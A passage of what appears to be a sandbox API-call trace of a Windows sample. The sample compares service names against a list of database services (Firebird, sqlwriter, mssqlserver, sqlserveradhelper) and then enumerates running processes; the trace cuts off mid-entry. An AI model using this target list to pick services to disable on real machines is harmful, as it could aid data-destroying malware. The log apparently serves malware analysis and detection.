[0195.573] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0195.573] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0195.573] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0195.573] lstrlenW (lpString="DeviceAssociationService") returned 24 [0195.573] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0195.573] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0195.573] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0195.573] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0195.574] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0195.574] lstrlenW (lpString="Dhcp") returned 4 [0195.574] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0195.574] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0195.574] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0195.574] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0195.574] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0195.574] lstrlenW (lpString="Dnscache") returned 8 [0195.574] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0195.574] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0195.574] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0195.574] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0195.574] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0195.574] lstrlenW (lpString="DPS") returned 3 [0195.574] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0195.574] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0195.574] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0195.574] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0195.574] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0195.574] lstrlenW (lpString="DusmSvc") returned 7 [0195.574] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0195.574] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0195.574] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0195.574] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0195.574] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0195.574] lstrlenW (lpString="EventLog") returned 8 [0195.575] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0195.575] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0195.575] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0195.575] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0195.575] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0195.575] lstrlenW (lpString="EventSystem") returned 11 [0195.575] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0195.575] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0195.575] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0195.575] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0195.575] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0195.575] lstrlenW (lpString="FontCache") returned 9 [0195.575] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0195.575] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0195.575] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0195.575] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0195.575] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0195.575] lstrlenW (lpString="gpsvc") returned 5 [0195.575] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0195.575] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0195.575] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0195.575] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0195.575] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0195.575] lstrlenW (lpString="iphlpsvc") returned 8 [0195.575] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0195.575] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0195.576] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0195.576] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0195.576] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0195.576] lstrlenW (lpString="KeyIso") returned 6 [0195.576] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0195.576] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0195.576] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0195.576] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0195.576] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0195.576] lstrlenW (lpString="LanmanServer") returned 12 [0195.576] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0195.576] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0195.576] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0195.576] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0195.576] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0195.576] lstrlenW (lpString="LanmanWorkstation") returned 17 [0195.576] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0195.576] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0195.576] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0195.576] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0195.576] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0195.576] lstrlenW (lpString="lfsvc") returned 5 [0195.576] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0195.576] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0195.576] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0195.576] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0195.577] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0195.577] lstrlenW (lpString="lmhosts") returned 7 [0195.577] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0195.577] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0195.577] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0195.577] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0195.577] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0195.577] lstrlenW (lpString="LSM") returned 3 [0195.577] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0195.577] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0195.577] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0195.577] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0195.577] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0195.577] lstrlenW (lpString="MpsSvc") returned 6 [0195.577] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0195.577] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0195.577] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0195.577] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0195.577] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0195.577] lstrlenW (lpString="NcbService") returned 10 [0195.577] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0195.577] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0195.577] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0195.577] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0195.577] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0195.577] lstrlenW (lpString="netprofm") returned 8 [0195.577] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0195.577] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0195.578] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0195.578] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0195.578] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0195.578] lstrlenW (lpString="NgcSvc") returned 6 [0195.578] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NgcSvc") returned -1 [0195.578] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NgcSvc") returned -1 [0195.578] lstrcmpiW (lpString1="sqlwriter", lpString2="NgcSvc") returned 1 [0195.578] lstrcmpiW (lpString1="mssqlserver", lpString2="NgcSvc") returned -1 [0195.578] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NgcSvc") returned 1 [0195.578] lstrlenW (lpString="NlaSvc") returned 6 [0195.578] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0195.578] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0195.578] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0195.578] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0195.578] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0195.578] lstrlenW (lpString="nsi") returned 3 [0195.578] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0195.578] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0195.578] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0195.578] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0195.578] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0195.578] lstrlenW (lpString="PcaSvc") returned 6 [0195.578] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0195.578] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0195.579] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0195.579] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0195.579] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0195.579] lstrlenW (lpString="PlugPlay") returned 8 [0195.579] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0195.579] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0195.579] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0195.579] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0195.579] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0195.579] lstrlenW (lpString="Power") returned 5 [0195.579] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0195.579] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0195.579] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0195.579] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0195.579] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0195.579] lstrlenW (lpString="ProfSvc") returned 7 [0195.579] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0195.579] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0195.579] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0195.579] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0195.579] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0195.579] lstrlenW (lpString="RpcEptMapper") returned 12 [0195.579] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0195.579] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0195.579] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0195.579] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0195.579] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0195.580] lstrlenW (lpString="RpcSs") returned 5 [0195.580] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0195.580] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0195.580] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0195.580] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0195.580] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0195.580] lstrlenW (lpString="SamSs") returned 5 [0195.580] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0195.580] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0195.580] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0195.580] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0195.580] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0195.580] lstrlenW (lpString="Schedule") returned 8 [0195.580] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0195.580] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0195.580] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0195.580] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0195.580] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0195.580] lstrlenW (lpString="SecurityHealthService") returned 21 [0195.580] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0195.580] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0195.580] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0195.580] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0195.580] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0195.580] lstrlenW (lpString="SENS") returned 4 [0195.581] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0195.581] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0195.581] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0195.581] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0195.581] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0195.581] lstrlenW (lpString="ShellHWDetection") returned 16 [0195.581] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0195.581] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0195.581] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0195.581] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0195.581] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0195.581] lstrlenW (lpString="Spooler") returned 7 [0195.581] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0195.581] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0195.581] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0195.581] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0195.581] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0195.581] lstrlenW (lpString="StateRepository") returned 15 [0195.581] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="StateRepository") returned -1 [0195.581] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="StateRepository") returned -1 [0195.581] lstrcmpiW (lpString1="sqlwriter", lpString2="StateRepository") returned -1 [0195.581] lstrcmpiW (lpString1="mssqlserver", lpString2="StateRepository") returned -1 [0195.581] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="StateRepository") returned -1 [0195.581] lstrlenW (lpString="SysMain") returned 7 [0195.581] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0195.581] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0195.581] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0195.582] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0195.582] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0195.582] lstrlenW (lpString="SystemEventsBroker") returned 18 [0195.582] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0195.582] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SystemEventsBroker") returned -1 [0195.582] lstrcmpiW (lpString1="sqlwriter", lpString2="SystemEventsBroker") returned -1 [0195.582] lstrcmpiW (lpString1="mssqlserver", lpString2="SystemEventsBroker") returned -1 [0195.582] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SystemEventsBroker") returned -1 [0195.582] lstrlenW (lpString="Themes") returned 6 [0195.582] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0195.582] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0195.582] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0195.582] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0195.582] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0195.582] lstrlenW (lpString="tiledatamodelsvc") returned 16 [0195.582] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0195.582] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="tiledatamodelsvc") returned -1 [0195.582] lstrcmpiW (lpString1="sqlwriter", lpString2="tiledatamodelsvc") returned -1 [0195.582] lstrcmpiW (lpString1="mssqlserver", lpString2="tiledatamodelsvc") returned -1 [0195.582] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x358 [0195.587] Process32FirstW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0195.587] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0195.588] lstrlenW (lpString="System") returned 6 [0195.588] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0195.589] lstrlenW (lpString="smss.exe") returned 8 [0195.589] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0195.590] lstrlenW (lpString="csrss.exe") returned 9 [0195.590] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0195.591] lstrlenW (lpString="wininit.exe") returned 11 [0195.591] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0195.592] lstrlenW (lpString="csrss.exe") returned 9 [0195.592] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0195.593] lstrlenW (lpString="winlogon.exe") returned 12 [0195.593] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0195.593] lstrlenW (lpString="services.exe") returned 12 [0195.594] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0195.594] lstrlenW (lpString="lsass.exe") returned 9 [0195.594] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0195.595] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0195.595] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0195.596] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0195.596] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.597] lstrlenW (lpString="svchost.exe") returned 11 [0195.597] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.598] lstrlenW (lpString="svchost.exe") returned 11 [0195.598] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0195.598] lstrlenW (lpString="dwm.exe") returned 7 [0195.599] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.599] lstrlenW (lpString="svchost.exe") returned 11 [0195.599] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.600] lstrlenW (lpString="svchost.exe") returned 11 [0195.600] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.601] lstrlenW (lpString="svchost.exe") returned 11 [0195.601] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.602] lstrlenW (lpString="svchost.exe") returned 11 [0195.602] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.603] lstrlenW (lpString="svchost.exe") returned 11 [0195.603] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.603] lstrlenW (lpString="svchost.exe") returned 11 [0195.603] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0195.604] lstrlenW (lpString="svchost.exe") returned 11 [0195.604] Process32NextW (in: hSnapshot=0x358, lppe=0x245fd2c | out: lppe=0x245fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, 